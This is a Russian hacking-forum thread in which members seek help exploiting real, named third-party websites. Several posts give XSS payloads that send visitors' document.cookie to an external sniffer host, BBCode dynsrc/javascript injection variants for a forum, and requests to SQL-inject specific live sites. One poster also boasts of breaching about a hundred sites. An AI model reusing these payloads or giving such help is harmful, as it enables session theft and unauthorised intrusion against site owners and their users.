Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / Безопасность / Уязвимости и защита
 
  Страница 1
  , 13:16   #1
Продвинутый
 
Аватар для stan_q
 
Локация: Бродяга
Регистрация: 26.04.2009
Сообщений: 1,193

Репутация: 389 / 5
По умолчанию Вопросы по уязвимостям

Предлагаю сделать небольшую объединяющую тему для разбора реальных уязвимостей, будь sqli, xss, инклуды и т.п.

Если выкладываете ссылку на сайт, делайте хайд, чтобы она не индексировалась. Ну и максимально полное описание проблемы + четко сформулированный вопрос. Перед тем, как задать вопрос, прошу пользоваться гуглом и поиском по форуму, чтобы не спрашивать дважды, а то и трижды одно и то же.
__________________
Критикуя - предлагай
Пользователь вне форума    
Наши Спонсоры
  , 16:49   #2
Местный
 
Локация: Где-то тут, недалеко от где-то там.
Регистрация: 03.04.2009
Сообщений: 355

Репутация: 110 / 2
По умолчанию Re: Вопросы по уязвимостям

Вобщем проблемма такая) Нашел уязвимость на рандомном сайте
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь

alert('') выполняется при вводе
code:
 '><''>"><script>alert(/XSS/)</script>
в строку поиска или в адресную строку.

Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется..

Сообственно тело скрипта
code:
 "><script>
img = new Image(); img.src = "Адресс снифа"+document.cookie;
</script>
Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =)

p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?..
__________________
Если слишком часто посылать людей в google, то google начнёт отвечать на запросы отсылкой в google =/
Пользователь вне форума    
  , 18:40   #3
Продвинутый
 
Аватар для stan_q
 
Локация: Бродяга
Регистрация: 26.04.2009
Сообщений: 1,193

Репутация: 389 / 5
По умолчанию Re: Вопросы по уязвимостям

Срабатывает так:
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь


Используй код для пассивной атаки из настроек нашего снифера
__________________
Критикуя - предлагай
Пользователь вне форума    
  , 19:22   #4
Местный
 
Локация: Где-то тут, недалеко от где-то там.
Регистрация: 03.04.2009
Сообщений: 355

Репутация: 110 / 2
По умолчанию Re: Вопросы по уязвимостям

stan_q, да, так прокатило =) спасибо большое))

тогда по теме еще один вопрос, возможно ли запускать этот скрипт через результат поиска по сайту (если XSS в поисковике, а адресная строка без уязвимостей)

Я так понимаю, если alert прокатывает, значит сайт пропускает <script>. А если сайт пропускает скрипт, то можно вбить его в поисковик и в обновлённой странице в исходном коде будет целый и невредимый скрипт.. Тоесть при заходе юзера на ссылку с результатом поиска, при загрузке страницы этот скрипт будет выполняться. Я правильно понимаю?)
__________________
Если слишком часто посылать людей в google, то google начнёт отвечать на запросы отсылкой в google =/
Пользователь вне форума    
  , 19:31   #5
Продвинутый
 
Аватар для stan_q
 
Локация: Бродяга
Регистрация: 26.04.2009
Сообщений: 1,193

Репутация: 389 / 5
По умолчанию Re: Вопросы по уязвимостям

Да, если alert срабатывает, то скрипт не фильтрует вводимые данные. Но если запрос передается через POST-запрос, то для эксплуатации надо будет применять разные методы, чтобы заставить жертву выполнить нужный тебе запрос. Т.е. чтобы жертва сама ввела в поиск вредноносный код и нажала энтер для его выполнения. Поправьте меня, если я ошибаюсь.

[offtop] Мой 1000-й пост [/offtop]
__________________
Критикуя - предлагай
Пользователь вне форума    
  , 19:56   #6
Местный
 
Локация: Где-то тут, недалеко от где-то там.
Регистрация: 03.04.2009
Сообщений: 355

Репутация: 110 / 2
По умолчанию Re: Вопросы по уязвимостям

stan_q, Post запросы, вроде как, идут только на ресурсах с коментариями и заливкой файлов. И то, только в части сайта.. Другая часть сайта работает по обычному принципу

Если фильтр изменяет символы
code:
< > "
, еще есть шанс замутить активную XSS или только пасивную?

В разных частях сайта запросы выполняются по разному или везде один фильтр? тоесть если на всех страницах сайта Alert не канает, возможно ли существование такого отдела сайта, где скрипт запустится? или фильтр работает по всему сайту?

p.s. Гц с юбилейным постом =)
__________________
Если слишком часто посылать людей в google, то google начнёт отвечать на запросы отсылкой в google =/
Пользователь вне форума    
  , 17:28   #7
Местный
 
Локация: Где-то тут, недалеко от где-то там.
Регистрация: 03.04.2009
Сообщений: 355

Репутация: 110 / 2
По умолчанию Re: Вопросы по уязвимостям

Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление
code:
[JPG][/JPG]
Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =)
Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =)
Но при попытке вставить Java код, а точнее
code:
http://httpz.ru/картинка dynsrc=javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;</script>')
картинка убивается и на её месте пустое место.
Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает?

p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается)

p.s.s. Вот всё, что известно мне о сайте.
1)Форум стоит на булке v4.0.0
2)Фильтратор изменяет такие символы, как < и > и "
3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым)

Что можно еще попробовать сделать с скриптом?) Интересны все предложения =)
__________________
Если слишком часто посылать людей в google, то google начнёт отвечать на запросы отсылкой в google =/
Пользователь вне форума    
  , 11:36   #8
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию Re: Вопросы по уязвимостям

Цитата:
Что можно еще попробовать сделать с скриптом?
HTML highlight
[img]http://www.qweqw.ru/"/dynsrc="javascript:alert()"/1.jpg[/img]
[img]http://www.qwewqw.ru/"/dynsrc=javascript:alert()/1.jpg[/img]
где http://www.qweqw.ru/1.jpg - адрес отображаемой картинки
__________________
wut...?
Пользователь вне форума    
  , 14:02   #9
Местный
 
Локация: Где-то тут, недалеко от где-то там.
Регистрация: 03.04.2009
Сообщений: 355

Репутация: 110 / 2
По умолчанию Re: Вопросы по уязвимостям

[email protected]@KEP, не прокатило.. картинка не запустилась ни в одном случае)
__________________
Если слишком часто посылать людей в google, то google начнёт отвечать на запросы отсылкой в google =/
Пользователь вне форума    
  , 04:14   #10
Новичок
 
Регистрация: 25.10.2009
Сообщений: 25

Репутация: 0 / 0
По умолчанию Re: Вопросы по уязвимостям

Такой вопрос!
Вот сайт
http://teploe-okno.ru/page.php?pid=-1

возврашает 2 ошибки одна в левом столбце это sql ошибка! до неё я не смог добраться((
а внизу перед footer возникает такая ошибка
code:
Warning: is_dir() [function.is-dir]: open_basedir restriction in effect. File(/var/www/vhosts/teploe-okno.ru/httpdocs/hpics/1/) is not within the allowed path(s): (/home/users2/k/karakovski/:/usr/local/lib/php/:/tmp/) in /home/users2/k/karakovski/domains/teploe-okno.ru/page.php on line 31
как я знаю is_dir()
булевая функция опредиляюшие евляеться ли файл дирикторией!

Вот у меня вопрос это значит что файл подгружаеться из дериктории get параметром??
если да то что можно сделать??
и вообще что можно сделать?
__________________
Нужен сайт! обрашайся!=)
[SPOILER]473787651[/SPOILER]
Пользователь вне форума    
  , 05:46   #11
Продвинутый
 
Аватар для stan_q
 
Локация: Бродяга
Регистрация: 26.04.2009
Сообщений: 1,193

Репутация: 389 / 5
По умолчанию Re: Вопросы по уязвимостям

Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1

Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.
__________________
Критикуя - предлагай
Пользователь вне форума    
  , 09:19   #12
Новичок
 
Регистрация: 25.10.2009
Сообщений: 25

Репутация: 0 / 0
По умолчанию Re: Вопросы по уязвимостям

Цитата:
Сообщение от stan_q Посмотреть сообщение
Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1

Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.
да это уже не суть важно я и так смог добраться до базы)))

примерно 100 сайтов за раз раскрыл и видео снял)))
если интересно)) http://zalil.ru/upload/29821677

Добавлено через 5 часов 28 минут
вот нашел сайт все перепробывал что знал даже версию узнать не могу((

подскажите
code:
http://www.turkishculturalfoundation.org/pages.php?ID=1%27
Добавлено через 5 часов 39 минут
Кстате там еще и поис %27 не воспринимает точней ошибку выдает)))
а как через поиск ломать также?
__________________
Нужен сайт! обрашайся!=)
[SPOILER]473787651[/SPOILER]

Последний раз редактировалось lesha_firs; 16.10.2010 в 14:58. Причина: Добавлено сообщение
Пользователь вне форума    
  , 19:04   #13
Постоянный
 
Аватар для hugolom
 
Регистрация: 21.04.2010
Сообщений: 846

Репутация: 320 / 4
По умолчанию Re: Вопросы по уязвимостям

Скрытый текст (вы должны быть авторизованы и иметь 50 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
__________________
ем детей
Пользователь вне форума    
  , 20:27   #14
Продвинутый
 
Аватар для M@ZAX@KEP
 
Локация: 404 - Not Found
Регистрация: 14.05.2009
Сообщений: 2,831

Репутация: 616 / 8

HPC Activity Medal 
По умолчанию Re: Вопросы по уязвимостям

hugolom, что тебя смущает в первом? Когда пишешь и оно выводит, это кагбэ почти пассивка. Но там htmlspecialchars, так что кури бамбук.

Что ты получаешь во втором я не знаю, я получаю "документ не найден", то бишь 404. И я вообще не вижу, какому ты там скрипту пытался передать код с алертом и что это ещё за локальные протоколы file:// ?!

В 3 у тебя чистое раскрытие пути, но зачем ты натыкал слэшей перед news в адресе? Типа красивее? :ag: И никакого локального инклуда там нет, что ты пытался там сделать - непонятно))) /etc/passwd ты там так точно не поимеешь.
__________________
wut...?
Пользователь вне форума    
  , 13:30   #15
Постоянный
 
Аватар для hugolom
 
Регистрация: 21.04.2010
Сообщений: 846

Репутация: 320 / 4
По умолчанию Re: Вопросы по уязвимостям

Тогда как можно обойти чтоли htmlspecialchars? есть варианты?
__________________
ем детей
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сетевой этикет (Перед тем, как задать вопрос хакеру) Ram0nlord За чашечкой чая 6 21.05.2012 19:01
Вопросы новичков по дорвеям sanchezqwert SEO 2 26.05.2011 07:51
Тут вопросы по дедикам, радминам! Shade Новичкам 71 16.12.2010 21:56
Ответы на все твои вопросы stan_q Новичкам 3 14.12.2010 22:44
[Вопрос] Вопросы по взлому,хакерству. zet611 Новичкам 10 29.10.2010 15:40



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.